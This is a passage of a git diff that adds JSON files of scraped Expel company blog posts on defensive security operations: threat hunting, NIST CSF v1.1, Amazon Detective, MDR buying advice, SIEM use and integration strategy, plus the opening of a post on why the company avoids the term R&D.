this one of the most valuable features of our hunting service and include it in our hunt findings report as an added bonus. Expel reports this information in a dedicated \u2018Insights\u2019 section of our hunt findings report. We examine our customers\u2019 workings and identify areas that need attention, like misconfigured tools or other unnecessary operational costs they\u2019re incurring. We also use these insights in a few other ways. For one, insights help set a baseline understanding of what\u2019s going on in your environment. Second, they can help break down communication silos between teams in your org to build a common understanding of your infrastructure. Finally, insights highlight important operational information your team should be aware of, ranging from security to compliance to operational issues that are increasing costs, like large unidentified elastic compute cloud (EC2) instances. And while these insights give you a better understanding of your infrastructure, they also enhance our unique context for our customers\u2019 orgs that we then use to improve our detection strategies for their specific environments. So, is it worth it? Research shows that hunting is quickly growing in importance and becoming a staple of a strong security strategy. Expel\u2019s chosen \u2018side\u2019 is this: we fully believe in its benefits to not just identify evolving threats, but also to give you a better fundamental understanding of your environment. The next time someone asks if it\u2019s worth it, here\u2019s the real value of hunting: It\u2019s the best way to stay ahead, mitigate your overall exposure (for example, reduce dwell time which is the time an attacker spends undetected in your environment), and give you a stronger chance of catching bad actors that have slipped past your security tools. Hunting enhances the visibility of your environment and provides an extra layer of protection that can prevent catastrophic damage. But keep in mind that developing a hunting strategy and capability is a time-consuming investment that requires a lot of resources. And even mature security teams might need threat hunting support to hunt efficiently and effectively. Feels familiar? If you\u2019re currently evaluating a hunting service (or thinking about it after reading this blog post), check out this impact report for buyers." +} \ No newline at end of file diff --git a/what-s-new-in-nist-cybersecurity-framework-v1-1.json b/what-s-new-in-nist-cybersecurity-framework-v1-1.json new file mode 100644 index 0000000000000000000000000000000000000000..34003d19dadd0cf76b12797a38446326a6b1cbb1 --- /dev/null +++ b/what-s-new-in-nist-cybersecurity-framework-v1-1.json @@ -0,0 +1,6 @@ +{ + "title": "What's New in NIST Cybersecurity Framework v1.1", + "url": "https://expel.com/blog/whats-new-in-nist-csf/", + "date": "Apr 26, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG What\u2019s new in the NIST Cybersecurity Framework (CSF) v1.1 Security operations \u00b7 4 MIN READ \u00b7 BRUCE POTTER \u00b7 APR 26, 2018 \u00b7 TAGS: Framework / NIST / Overview / Planning On April 16, 2018, NIST published Framework for Improving Critical Infrastructure Cybersecurity Version 1.1 \u201cWhere do I start?\u201d It\u2019s a common question for organizations that are trying to get their arms around the sprawling issues of cybersecurity and risk management. For most, this question eventually leads them to the NIST Cybersecurity Framework (CSF). Since it was published in 2014, it has been a frequent starting point. It\u2019s not perfect, but it has provided a common language and structure for discussing and improving security. Thousands of organizations are now using the framework. And that\u2019s a good thing. It\u2019s safe to say we\u2019re fans of the NIST CSF here at Expel. We use it to help manage our own cyber risk and to help communicate our needs and plans to our customers and suppliers. We\u2019ve created a \u201cHow to get started\u201d guide and free NIST CSF self-scoring tool that lets you chart your \u201cas is\u201d and \u201cto be\u201d states using the framework in a couple of hours \u2014 we even offer an interactive version of it for our customers within Expel Workbench.. If you\u2019re looking to get started with the framework it should help quite a bit. Now, after 4 years, many comments, questions, and suggestions, NIST has officially released version 1.1 of the Cybersecurity Framework. Not much has changed between draft 2 of v1.1, which was published for comment in December 2017 and the final release. Version 1.1 is still compatible with version 1.0, so the changes to the framework aren\u2019t earth shattering. They\u2019re largely refinements based on feedback from the community. In case doing a \u201cstare-and-compare\u201d of the original and updated frameworks isn\u2019t your idea of fun, I\u2019ve highlighted three important changes below. 1. Assess yourself first \u2026 then measure It has always been difficult for some organizations to use the framework because NIST didn\u2019t provide clear guidance on exactly what to use it for. While the initial Framework talked about tiers of implementation, there wasn\u2019t much discussion on how to actually grade yourself or other ways to measure how well you were doing from a cybersecurity perspective. It was brand new back in 2014 so that makes sense. The updated version fills in some of those gaps. Specifically, Section 4, which used to be called \u201cMeasuring and Demonstrating Cybersecurity\u201d has been re-christened \u201cSelf-Assessing Cybersecurity Risk with the Framework.\u201d While both names are equally dry (hey\u2026what do you expect from a standards body), they cut to the core of how to operationalize the framework. Self assessments are key to understanding your \u201cas is\u201d state and formulating a plan for improving your organization\u2019s cybersecurity. In fact, they\u2019ve been one of the framework\u2019s big successes. By focusing Section 4 on self-assessment, NIST is making sure organizations that are new to the framework focus on one of the framework\u2019s primary use cases. 2. Supply chain risk management (SCRM) \u2014 now with real guidance It\u2019s no secret that supply chain partners are often the soft underbelly for attackers looking for a way in. But answers for how to protect the supply chain are harder to come by. Past versions of the NIST framework highlighted SCRM as an important component of a cybersecurity program. But they didn\u2019t really say anything else. The new version of the framework adds a lot more detail and integrates SCRM with the rest of the framework. It feels a lot more complete. So, if you\u2019re one of those people who\u2019ve been beating the SCRM drum for three\u2026or\u2026five\u2026or\u2026ten years, you\u2019ll find new ammunition to beat the drum even louder. There are several pages on managing risks in your supply chain through third party assessments, targeted security controls and holding suppliers accountable. 3. External participation \u2013 when and how you should get outsiders involved The final notable change I want to call out relates to when and how you should get outside parties involved in your program. As a quick refresher, NIST defines four tiers of maturity. It starts with Tier 1, which NIST charitably calls \u201cPartial\u201d. This includes organizations that only deal with cyber risk when they\u2019re forced to. Fast forward to Tier 4 (aka \u201cAdaptive\u201d) organizations and you\u2019re looking at risk management machines. NIST ranks each tier according to risk management processes, integrated risk management programs and\u2026you guessed it\u2026external participation. But previous versions of the framework didn\u2019t give the reader much to go on when it came to external participation. There was a sentence or two describing what was appropriate for that tier. But not enough to build into your program. The new definitions are much more complete. They include discussion on external communication, the broader community and guidance on how to interact with supply chain stakeholders. \u2014 Overall, version 1.1 of the NIST framework feels a lot more complete to me than version one. That\u2019s not surprising given we\u2019ve had three years to digest and use it. In addition to the practical experience, our understanding of cyber risk has continued to evolve. If you\u2019ve thought about using the NIST framework before but felt it was too daunting, now might be a time to take another look. If, on the other hand, you\u2019re already using NIST I\u2019d suggest taking a look at the three sections I\u2019ve highlighted above to see if they can help focus your implementation by turning some of the more theoretical aspects of the NIST framework into tangible things you can go execute on. Either way, I recommend checking out our blog post, \u201cHow to get started with the NIST Cybersecurity Framework (CSF).\u201d It\u2019s a (hopefully) easy-to-understand overview that we\u2019ve written to help people put the NIST CSF into practice. We\u2019ve also updated our NIST CSF self-scoring tool to reflect tweaks to the Supply Chain Risk Management and Identity Management and Access Control subcategories. If you used the previous version of our tool, there\u2019s no need to re-do you work. The changes are all small modifications and don\u2019t change the overall approach." +} \ No newline at end of file diff --git a/where-does-amazon-detective-fit-in-your-aws-security.json b/where-does-amazon-detective-fit-in-your-aws-security.json new file mode 100644 index 0000000000000000000000000000000000000000..bdc5b74f74c106908b4c60d547949c8b793d4707 --- /dev/null +++ b/where-does-amazon-detective-fit-in-your-aws-security.json @@ -0,0 +1,6 @@ +{ + "title": "Where does Amazon Detective fit in your AWS security ...", + "url": "https://expel.com/blog/amazon-detective-fit-in-aws-security-landscape/", + "date": "Dec 3, 2019", + "contents": "Subscribe \u00d7 EXPEL BLOG Where does Amazon Detective fit in your AWS security landscape? Security operations \u00b7 3 MIN READ \u00b7 MATT PETERS AND PETER SILBERMAN \u00b7 DEC 3, 2019 \u00b7 TAGS: Cloud security / How to / Managed security / Tools Amazon Web Services (AWS) has rolled out some really nifty security capabilities over the last couple of years. Amazon Detective is AWS\u2019 latest innovation. If you run workloads on AWS, then you\u2019re probably already familiar with some of the other AWS-native security tools like Amazon GuardDuty, AWS Security Hub and Amazon Macie. So where does Amazon Detective fit into this puzzle? What is Amazon Detective? Think of Amazon Detective as investigative support for AWS GuardDuty alerts. AWS announced the public preview program for Amazon Detective at re:Invent 2019 and Expel is one of the first managed detection and response (MDR) providers to support it. We\u2019re thrilled to be an early service partner for Amazon Detective! AWS CISO Steve Schmidt talks about Amazon Detective during re:Invent 2019; Expel is named as a service partner. In practice, Amazon Detective makes it easier for AWS customers and their MDR providers to analyze, investigate and quickly identify the root cause of security findings or suspicious activities. The service automatically extracts, distills and organizes data from VPC Flow Logs, AWS CloudTrail and Amazon GuardDuty, and creates an interactive view with contextual information that summarizes resource behaviors and interactions observed across your AWS environment. Amazon Detective can help speed up investigations for supported GuardDuty findings. For example, if you receive a GuardDuty finding of suspicious VPC flow activity, Amazon Detective will now present you with relevant information about the IPs involved in that GuardDuty finding. This speeds up the time to triage an alert (and likely cuts response time too). Amazon Detective might also prompt you (or your security analysts) with questions you should be thinking about answering. This fits nicely with how Expel thinks about the analyst mindset, and how we train our analysts to answer questions instead of following specific pre-set run books. Where does Amazon Detective fit in your AWS security strategy? If you\u2019re new to AWS and are looking for a simple this-tool-does-that primer, then here\u2019s a good place to start. At Expel, many of our customers run workloads on AWS and our analysts work with alerts from these environments on a regular basis to investigate suspicious activity. We\u2019ve published several how-to\u2019s for popular AWS security tools, along with some tutorials on fixing common cloud security issues. Be sure to check out: Making sense of Amazon GuardDuty alerts Following the CloudTrail: Generating strong AWS security signals with Sumo Logic How to find Amazon S3 bucket misconfigurations and fix them ASAP When it comes to securing the cloud, Amazon provides a panoply of solutions which can be a bit dazzling (and different from what you\u2019d find in a traditional on-prem security stack). We\u2019ve found that by mapping these to a set of jobs that our analysts do, it provides a helpful framework for thinking about them. Broadly, we bucket the AWS offerings into three categories. Why we\u2019re excited about Amazon Detective Amazon Detective is helpful addition to AWS\u2019 suite of security tools. At Expel, we believe that quality forensic investigations require context and decision support, and that\u2019s exactly what Amazon Detective provides. A security alert alone doesn\u2019t tell you much, but the context surrounding it is essential to figuring out whether you\u2019ve got a false positive or a legitimate issue on your hands. The right historical details and the right behavior analytics are what turns any old alert into the lead that cracks the case. For example, if it\u2019s 2am and you\u2019re looking at an anomalous login, the context around that user\u2019s login is helpful \u2014 is this a real problem, or is Pat on sabbatical in Spain? Put your cloud security skills to the test Whether or not Amazon Detective has a place in your security strategy right now, it\u2019s easy to test out the AWS security tools you\u2019re already using in staged environments. Once you\u2019re feeling confident using the AWS-native security tools, put your team\u2019s detection skills to the test by creating a threat emulation exercise for AWS . This is something we do often at Expel. Simulating realistic attacks in cloud environments helps our analysts build muscle memory and prepares them to act quickly and correctly when something bad happens. Like this idea but not sure how to get started with creating your own? We\u2019ve got an entire post that walks you through the process of creating a cloud-based threat emulation exercise . We even threw in a sample scenario for you, complete with instructions on how to simulate the attack in your AWS environment . Enjoy!" +} \ No newline at end of file diff --git a/which-flavor-of-mdr-is-right-for-your-org.json b/which-flavor-of-mdr-is-right-for-your-org.json new file mode 100644 index 0000000000000000000000000000000000000000..d550f1ce8b884579459b982b3c55802948969b6e --- /dev/null +++ b/which-flavor-of-mdr-is-right-for-your-org.json @@ -0,0 +1,6 @@ +{ + "title": "Which flavor of MDR is right for your org?", + "url": "https://expel.com/blog/which-flavor-of-mdr-is-right-for-your-org/", + "date": "Mar 30, 2023", + "contents": "Subscribe \u00d7 EXPEL BLOG Which flavor of MDR is right for your org? Security operations \u00b7 2 MIN READ \u00b7 MIMI JACOBS \u00b7 MAR 30, 2023 \u00b7 TAGS: MDR At best, the managed detection and response (MDR) landscape is multi-faceted and complicated; at worst, it\u2019s downright confusing and frustrating to navigate. Further compounding the challenge of determining the best approach to MDR for your organization is the simple fact that it\u2019s unique. Your mix of security tools, your business-driven risk requirements, and the makeup of your security team are just some of the factors that play a role in finding and implementing the type of MDR that best meets your company\u2019s business and technical requirements. The fact remains that MDR can (and perhaps will) play an important role in your security strategy . As many orgs struggle to find the right people to fill roles, MDR is already helping bridge the gap\u2014and that trend is set to continue. According to Gartner, \u201cby 2025, 60% of organizations will be actively using remote threat disruption and containment capabilities delivered directly by MDR providers, up from 30% today.\u201d So if you\u2019re considering an MDR solution, now\u2019s a great time to learn more. Luckily, Gartner recently released its 2023 Market Guide for Managed Detection and Response Services , providing a comprehensive analysis of the MDR market, a look at its evolution, representative players in the space, and overall recommendations. We believe the Gartner analysts who authored the Market Guide do a great job providing some context before you begin your MDR search: MDR buyers must focus on the ability to provide context-driven insights that will directly impact their business objectives, as wide-scale collection of telemetry and automated analysis are insufficient when facing uncommon threats. This Market Guide lends clarity on where to start, core capabilities to consider, and optional capabilities that can bolster your MDR deployment. In fact, Gartner\u00ae outlines one of the first steps you should take: Define specific required outputs (incident ticket structure, reports) and goals that address defined use cases, before engaging with a provider. As with any outsourcing initiative, if outcomes are not defined, regardless of what service provider is used, the chance of success will be lessened. Buyers should also be cautious of overemphasizing the value of SLAs as part of detection-and-response-driven services. Going a layer deeper, a few of the core capabilities Gartner recommends are: 24\u00d77 remotely delivered detection and response functions. Turnkey delivery, with predefined and pretuned processes and detection content. Triage, investigate and manage responses to all discovered threats, regardless of priority with no limitations on volumes or time dedicated to the discovery and investigation process. And while you\u2019ll need to download the full report to get all the recommendations, market directions, recommended capabilities, and vendors in the MDR space (including yours truly), here\u2019s a taste of core MDR and adjacent services to consider: Download your copy of the Market Guide for Managed Detection and Response Services from Gartner here . This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Expel. Attribution: Gartner, Market Guide for Managed Detection and Response Services, Pete Shoard, Al Price, Mitchell Schneider, Craig Lawson, Andrew Davies, 4 February 2023. Disclaimer: GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally and is used herein with permission. All rights reserved. Gartner does not endorse any vendor, product or service depicted in its research publications and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner\u2019s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose." +} \ No newline at end of file diff --git a/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json b/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json new file mode 100644 index 0000000000000000000000000000000000000000..831b92073c72c8e12be52a1dc8cc7654f1b2da94 --- /dev/null +++ b/who-ya-gonna-call-to-make-the-most-of-your-siem-data.json @@ -0,0 +1,6 @@ +{ + "title": "Who ya gonna call (to make the most of your SIEM data)?", + "url": "https://expel.com/blog/who-ya-gonna-call-to-make-the-most-of-your-siem-data/", + "date": "Oct 31, 2022", + "contents": "Subscribe \u00d7 EXPEL BLOG Who ya gonna call (to make the most of your SIEM data)? Security operations \u00b7 4 MIN READ \u00b7 DAVE JOHNSON AND TYLER ZITO \u00b7 OCT 31, 2022 \u00b7 TAGS: Cloud security / MDR \u201cDetectin\u2019 makes us feel good!\u201d Are you troubled by strange alerts in the middle of the night? Do you experience feelings of dread in your on-prem or cloud environment? Have you or your security team ever seen a spook, specter, or ghost malware outbreak that you had trouble detecting quickly and remediating? For some security professionals, even the briefest consideration that a SIEM might not be the centerpiece of their security stack is a spooky, Shyamalan-esque, jumpscare movie they\u2019d only watch from behind the couch (with popcorn, of course). But Expel ain\u2019t afraid of no ghosts\u2026 For the record, we aren\u2019t The Gatekeeper of SIEM. We\u2019re The Keymaster, helping generate additional security value from your environment directly without having to rely entirely on a SIEM. In addition, as a somewhat radical challenge to industry trends, we can cross the streams between SIEM and the rest of your technology. We work with the tech our customers have in place, including their existing SIEM alerts and custom notables, to tailor the service to their requirements. The result combines top-shelf 24\u00d77 SOC and best-of-breed security technologies optimized for your technical and business context, improving visibility and mean time to detect and remediate (MTTD/MTTR). Fundamentally, what is a SIEM, anyway? Traditionally, a SIEM is a grouping of rules and logic that extract interesting events from a large set of data which, up until recently, was the only choice many of us had in trying to make sense of all the spooky log stuff coming out of our environments. We\u2019ve spent the past decade or so using SIEMs to solve a problem that other technologies are also solving (or as an add-on\u2013agents, for example). Endpoint detection and response (EDR), intrusion detection systems (IDS), and intrusion prevention systems (IPS), cloud access security brokers (CASBs), privileged access management (PAM)\u2013there are plenty of acronyms and abbreviations to choose from. This doesn\u2019t mean SIEMs are no longer useful\u2014they absolutely are\u2014but the ecosystem of high-fidelity solutions is expanding and evolving to address the complexity of evolving attacker methodology. But now a different problem rises from the grave: \u201chow can we keep track of it all?\u201d Should we try to scale by adding more rules and building a bigger SIEM? Or maybe elevate to a higher plane of existence where there is no SIEM, only ruuuuules! (and detections). Let\u2019s say you did decide to go the route of building a bigger SIEM. Consider a known constant, like the general size of a Twinkie. If we scale a standard SIEM to keep pace with the requirements of new telemetry and the massive, increasing complexity of data, we\u2019ll end up with a SIEM Twinkie weighing in at several hundred pounds. You\u2019re likely going to need even more people to lift that giant SIEM Twinkie than you currently have today. Let\u2019s talk about getting to that higher plane and making that giant SIEM Twinkie a more manageable size, shall we? Historically in the cybersecurity service industry, when someone asks if your product is a SIEM, you say yes! (or something to that effect) . Except here, because Expel isn\u2019t a SIEM. We\u2019re a security operations provider that incorporates SIEM alert data with all the other relevant sources of security information in your environment. The whole is greater than the sum of the parts, and this approach magnifies the detection and response impact of your security stack and team. The Expel Workbench\u2122 is the next step in the technical evolution of security monitoring. Ultimately, whether you believe in the existence of SIEM and its power to improve visibility in your cybersecurity environment, or not, we can help. Now, when there\u2019s something strange in your environment, the SIEM has to know what to look for, and if it doesn\u2019t then it won\u2019t know what to alert you about. An integrated platform (like Workbench) knows exactly what to watch for. What\u2019s abnormal? What\u2019s paranormal [fx: lightning flash, thunderclap, evil laughter] ? A modern, sophisticated SOC, where your existing SIEM is a part of the set-up, boosts time to response and efficiency, improving triage and enhancing investigations. For example, let\u2019s say we get an alert for a host named \u201cStayPuft\u201d engaging in malicious-looking user behavior. Additionally we\u2019ve noticed, user \u201cElvis\u201d is doing something strange. Because of the way we use automation for in-depth initial triage and correlation, our analysts have the time they need to investigate the user in detail. Who is \u201cElvis\u201d and when was the last time we saw them log in? Has there been any other strange behavior here? Is this the kind of behavior we expect from this user in this situation? Or is it completely harmless and would never ever possibly cause any sort of destruction? Armed with a full complement of relevant information from different sources and defensive layers, analysts can report back to the customer, quickly and accurately, with insight into appropriate next steps. Customers who import their finely honed SIEM into a tool like Workbench can translate all the human hours invested in development into customized rules for their special use cases. In other cases, they may realize they no longer need a SIEM, only rules\u2014specifically, all the proprietary detection rules that come with Expel Workbench that have direct relevance to the security tools you have in your stack. Imagine firing a beam of high-energy positrons at the malicious entity to \u201cExpel\u201d their activity from your environment into a containment vessel. (See what I did there? Expel? Get it?) Everything I\u2019m describing also lowers your overhead management and time spent on your SIEM. You literally get the best of both dimensions. There\u2019s a better, less scary way to team up and make the challenge of fielding security alerts much easier and actually enjoyable. If you have questions about how we can help you do exactly that, we\u2019d be happy to talk. We hope you enjoyed the absolutely necessary original Ghostbusters movie references. Have a Happy Halloween and may nothing too spooky happen over the holiday. But if it does\u2026. Who ya gonna call?" +} \ No newline at end of file diff --git a/why-don-t-you-integrate-with-foo.json b/why-don-t-you-integrate-with-foo.json new file mode 100644 index 0000000000000000000000000000000000000000..ac1f933e4c4c7d34c15f4acc994a964cadb218ef --- /dev/null +++ b/why-don-t-you-integrate-with-foo.json @@ -0,0 +1,6 @@ +{ + "title": "Why don't you integrate with [foo]?", + "url": "https://expel.com/blog/dont-integrate-with-foo/", + "date": "Oct 6, 2020", + "contents": "Subscribe \u00d7 EXPEL BLOG Why don\u2019t you integrate with [foo]? Security operations \u00b7 8 MIN READ \u00b7 YANEK KORFF \u00b7 OCT 6, 2020 \u00b7 TAGS: MDR / Tech tools When you\u2019re looking for a managed security provider that purports to \u201cwork with the tech you already have,\u201d you might be dismayed to hear that there\u2019s something you have we don\u2019t integrate with. How can that be? Is it just not something we\u2019ve built yet? Well, why not? I\u2019ll tell you. By the end of this post you\u2019ll understand why our thoughts on integration are likely different from what you\u2019ve heard elsewhere, and what this means for you if you want to work with Expel. Building a model to prioritize needles, not haystacks We\u2019ve all heard the phrase, \u201cIt\u2019s like looking for a needle in a haystack.\u201d Based on our many years spent working in the security industry, we\u2019ve discovered that collecting piles of hay (AKA security signals) and hoping there\u2019s a needle or two in there isn\u2019t the most efficient way for us to protect anyone\u2019s data and infrastructure. That\u2019s when we also realized that more integrations doesn\u2019t mean better results. In fact, it often results in lots of noise and a bundle of false positives. However, there\u2019s still a general mindset in our industry that the best move is to put all the data in one spot and then begin doing all the things. A pile of data = amazing results? Not always. So why does everyone still love \u201chaystacks\u201d of data? To understand this, let\u2019s rewind the clock about 20 years and see where we\u2019ve come from as an industry. When it comes to answering challenging questions and getting value out of data, we\u2019ve historically followed the business plan popularized (or documented?) by the Underpants Gnomes of Southpark . It goes like this: Collect Underpants ? Profit! Sound familiar? Everybody loves the idea of gathering a pile of data and expecting amazing results somehow later on. Applying the lens of the Gartner hype cycle to new technologies like data warehousing, business intelligence and big data analytics \u2026 you\u2019ll notice an uncanny parallel to this very same business model. A different approach: Asking questions first At Expel, we believe in taking a different approach when you\u2019re looking to get value out of data. It goes something like this: Identify the questions to which you\u2019ll want answers. Identify the speed at which you\u2019ll want these questions answered. Identify the data from which you\u2019ll derive the answers. Organize the data to support these use cases. Profit! Go back to step 1 and revisit periodically. Unfortunately, this approach is twice as long as the last one. On the other hand, it works. Let\u2019s take a look at it in the context of security operations. How do we come up with questions? TL;DR: We\u2019re trying to find out if there\u2019s something \u201cbad\u201d happening in the environment we\u2019re monitoring. This requires us to first ask ourselves a few questions. At Expel, we\u2019ve come up with a standard set of initial follow-up questions that inform what we do if we do spot something bad. But how do we know if something\u2019s bad? Well, our best bet is to have a lot of relevant context. For example, what technology generated the alert? Was the alert generated from an assumed role in AWS , if so \u2013 who assumed it? Has this user done this before? Did that user assume other roles at about the same time? What\u2019s the historical use profile of that source user? The list goes on. Some of this context we can collect up front because it comes along with the alert. Other context may require follow-up queries against other systems or historical records on what is \u201cnormal\u201d in the environment. Expel alert for suspicious login post-optimization with authentication history and frequency Why does speed matter? Because we triage a lot of alerts with a combination of technology and smart analysts. And chasing down the same kind of supporting information repeatedly is exhausting (and therefore, better to automate). When you\u2019re looking at alerts, the better the context you have the faster you can determine if what you\u2019re looking at is for sure bad, definitely a false positive or inconclusive. If an alert isn\u2019t definitely bad or definitely good, it needs follow up. We need to take time to investigate. Time is still of the essence here so we don\u2019t want to drag our feet, but we do this work substantially less often than we do triage work overall so we can afford to look around at potentially interesting data a bit. Another factor to consider is when we\u2019re doing investigations, the questions we ask aren\u2019t going to be quite as cookie-cutter. They can vary widely based on the alert and its surrounding initial context. Bottom line: We\u2019re going to do a lot of triage, and we\u2019re going to do it quickly. We need a lot of context to help streamline (and potentially automate major portions of) this process. Inconclusive results are less frequent, the questions are hard to predict and will vary based on the situation. Getting answers using the old model Let\u2019s take a look at what happens when we use the underpants business model for security operations. We collect logs from everywhere and put them in one giant pile. We write some rules that try to make sense of this and create a huge volume of alerts. These alerts have limited context so we have mostly inconclusive results. We\u2019re not sure what to automate, so we throw people at the problem. I like to call this the \u201clet\u2019s build haystacks so we can search for needles in them\u201d approach. We\u2019re firmly in the category of \u201cbiased dirty vendor\u201d here, so take this next statement with the appropriate grain of salt. Many of the security operations approaches we see in place today resemble this old model. When you see MDRs where SIEM is the foundation or there\u2019s co-managed SIEM offerings, you\u2019re probably looking at this model in action. We don\u2019t feel like this model works, so we approach things a bit differently. Applying the Expel model to security data Our approach is borne from both experience and several years of data that tells us the vast majority of incidents\u2019 initial leads come from specific vendor technologies that generate high quality alerts. First, we collect only alerts (not logs) that come from overall high quality sources, i.e. hay that looks like needles in the first place. Yes, Andrew, we know there\u2019s an exception when it comes to our cloud integrations . Our alerts probably come with decent context already depending on what tech generated them. An EDR tool is a great example of a context-rich alert data source. Next, based on the alert and initial context, there\u2019s other context we can grab from different systems. Let\u2019s automate those pivots and data grabs. For some alerts, it may be possible to grab additional automated context without pivoting on much data. For example, what else happened on this system within +/- 5 minutes? What other systems communicated with this IP address? We now have rich context that enables our security analysts ( or robots ) to make good decisions relatively quickly. As we watch this play out, if we keep close track of what analysts do next, we\u2019ll continue to learn how we can automate the process. Now we\u2019re left with a much smaller volume of investigations and much more time in our day . We don\u2019t need to answer the next set of questions with quite as much speed, because (1) the frequency of this work is way lower than for alerts and (2) we\u2019re going to have to apply more human judgement. What does this mean for integrations? The primary advantage of a tech integration with a system that can collect context and orchestrate actions is speed and automation. When questions are predictable and the repeatability of getting answers means that speed provides a huge time advantage\u2026 that\u2019s when integrations make the most sense. The disadvantages of integrations are twofold: you have to build them, and you have to maintain them.That\u2019s time you could otherwise be spending making your analysts more effective. So to figure out what we should prioritize from an integration perspective, let\u2019s look at how we can get answers to questions in the timeframe in which we need them. We think about four integration levels to support different degrees of predictability and urgency. Note that the amount of work required increases by level. Levels of integration Level 1: Accessible When predictability of question and urgency are lower, it\u2019s important that we can get the data, but we don\u2019t need an integration. This fits well into the kinds of data we use during an investigation versus during initial triage. A great example of this is a feature we call \u201cpivot to console.\u201d There are security technologies in play in some of our customer environments that either don\u2019t have APIs that allow us to gather additional context or historically have not generated signal that would have resulted in the identification of an incident. But they might support understanding what happened during one. For these technologies, our analysts can pivot to that tech\u2019s console directly through the Expel Workbench, and access the data there. Tracking this activity also helps us prioritize what tech we might want to integrate. Level 2: Indirect, via SIEM Most of the data in most SIEMs we\u2019ve worked with has been useful when paired with high-quality security signal. But the events, and many times the alerts produced by SIEMs themselves, are rarely the initial lead for an incident. We\u2019ll want to pull this data in through our Expel Assembler and correlate, via automation, relevant context into our overall alert stream. An example of this might be authentication failures that indicate brute-forcing. Level 3: Direct, uni-directional When we\u2019re looking at a data source that provides reasonably good security signal, or there are effective ways to filter the incoming data so that only the high-quality signal gets through, we\u2019ll want to integrate directly. Speed in this case is important both in finding a useful initial lead and perhaps in providing context. An example here might be some perimeter NGFW or IPS/IDS solutions that have good APIs and alerts with decent context. Level 4: Direct, bi-directional Technologies we\u2019d integrate in a bi-directional fashion not only provide high-quality security signal \u2013 the product on the other end can be modified to behave differently on the fly based on information we\u2019re seeing. It also likely has its own query ability where we can ask a set of predefined questions and get answers quickly (we like to say the quality of your investigation is rooted in the questions you ask). These technologies are essential to high-quality triage and tend to get used quite a bit during investigations. EDR technologies fit well into this category. What does this mean for me? If you\u2019re looking to work with Expel, this model should help explain how we think about prioritizing integrations and which integrations provide the most value in the context of security operations. We spend most of our time on the investigative leads that have the highest likelihood to be an actual incident. Which means they\u2019ll require action \u2013 fast. The more time we spend chasing our tails on alerts (or events) that don\u2019t matter, the more time we waste and the higher the risk we\u2019ll miss the important stuff. And what\u2019s \u201cimportant\u201d is contingent on each of our customers\u2019 unique environments. Which means we\u2019re also going to be spending a lot of time getting to know you. All the more reason why we don\u2019t want to waste time journeying on paths to nowhere. From an integrations standpoint, this means we put vendor technologies (that we haven\u2019t integrated) into three major buckets: We\u2019re interested in building this integration (levels 3 & 4), but haven\u2019t gotten to it yet. This is probably because we haven\u2019t seen this widely deployed among our base of customers and prospects with whom we\u2019ve spoken to date. We\u2019ve decided not to build a direct integration, because we can access that data or support investigations as needed through a SIEM with which we integrate (level 2). We\u2019ve decided not to build an integration at all (ever) because that data isn\u2019t used often enough for the work to be worth it (level 1). Follow @reefhack As everyone is well aware, the landscape of security technologies is immense and prioritization is critical \u2013 both for integrations and alerts themselves. Because technologies are always changing and growing, a given tech that we evaluated may have moved from one category to another. If you ever feel like we\u2019ve got an integration in the wrong bucket, we\u2019re always willing to listen and re-evaluate. I hope this helped shed some light on how and why we do things here at Expel \u2013 and maybe even inspired you to learn more. We\u2019re always happy to chat ." +} \ No newline at end of file diff --git a/why-expel-doesn-t-do-r-d-expel.json b/why-expel-doesn-t-do-r-d-expel.json new file mode 100644 index 0000000000000000000000000000000000000000..b6dee9798bd16d9c1888c7decd0143b2439b8c91 --- /dev/null +++ b/why-expel-doesn-t-do-r-d-expel.json @@ -0,0 +1,6 @@ +{ + "title": "Why Expel doesn't do R&D | Expel", + "url": "https://expel.com/blog/why-expel-doesnt-do-rd/", + "date": "Aug 16, 2018", + "contents": "Subscribe \u00d7 EXPEL BLOG Why Expel doesn\u2019t do R&D Expel insider \u00b7 11 MIN READ \u00b7 PETER SILBERMAN \u00b7 AUG 16, 2018 \u00b7 TAGS: Framework / Great place to work / Mission I recently introduced myself to a new investor as \u201cDirector of Innovation.\u201d He looked at me like I\u2019d just said I was a Disney Imagineer. Now, I love a good princess flick as much as anyone but I\u2019m no Imagineer. At any other company, I\u2019d be a director of R&D. But as the clickbaity (sorry) title says, we don\u2019t do R&D at Expel. At Expel we\u2019ve consciously chosen to avoid the term \u201cR&D\u201d to define a team, a job role or anything else. Instead, we use words like \u201cexperiments\u201d or \u2026 \u201cinnovation.\u201d A lot of thought went into this decision. You see, we\u2019re trying to challenge a lot of the standard ways managed services operate and that means we need to constantly challenge ourselves to do things in new ways and not just cut and paste processes from our past just because \u201cwe\u2019ve always done it that way.\u201d That includes R&D. Or, in this case, innovation. ========================= But first \u2026 a brief disclaimer ========================= Before I dive in though let me set the record straight on a couple things. This blog outlines research in the field of cybersecurity. I\u2019m sure some of the challenges I describe exist in other industries, but I don\u2019t have the experience to talk about them in that context. I\u2019m personally guilty of many of the bad behaviors we\u2019ll discuss. Expel\u2019s approach tries to address some of the challenges I\u2019ve both witnessed and experienced. Finally \u2026 yes, I know not every research group has all of the challenges I\u2019m about to outline. And \u2026 yes, I know not every researcher exhibits all the behaviors I\u2019m about to outline. And \u2026 yes, I\u2019m sure you and your group have none of these challenges. What\u2019s in a name? Quite a bit, it turns out. Think about it. R&D defines a group of people. You either belong or you don\u2019t. At Expel, we believe anyone can come up with a game changing idea. While some folks in the company are more focused on experimentation, we don\u2019t want to exclude anyone. We view innovation as the constant flow of ideas from anywhere in the company to a backlog that is actioned by individuals or teams across an organization. This means that everyone with a good idea or desire should be able to participate. That\u2019s why we choose the term innovation. Anyone can be \u201cinnovative.\u201d But you can\u2019t describe yourself as \u201cresearch and development(y)\u201d, especially if you\u2019re not in the group. There\u2019s also a flaw baked into the name itself. Research and development defines a workflow. And, just as its name suggests, a research group does research first and then develops a solution to a problem. But too many research groups view their job as done once they\u2019ve handed off their idea to engineering. Too often, they don\u2019t have any skin in the game when it comes to getting that solution into production. If the solution falls apart in engineering, culturally, they aren\u2019t encouraged to see that as a failure. Instead, they\u2019re more likely to 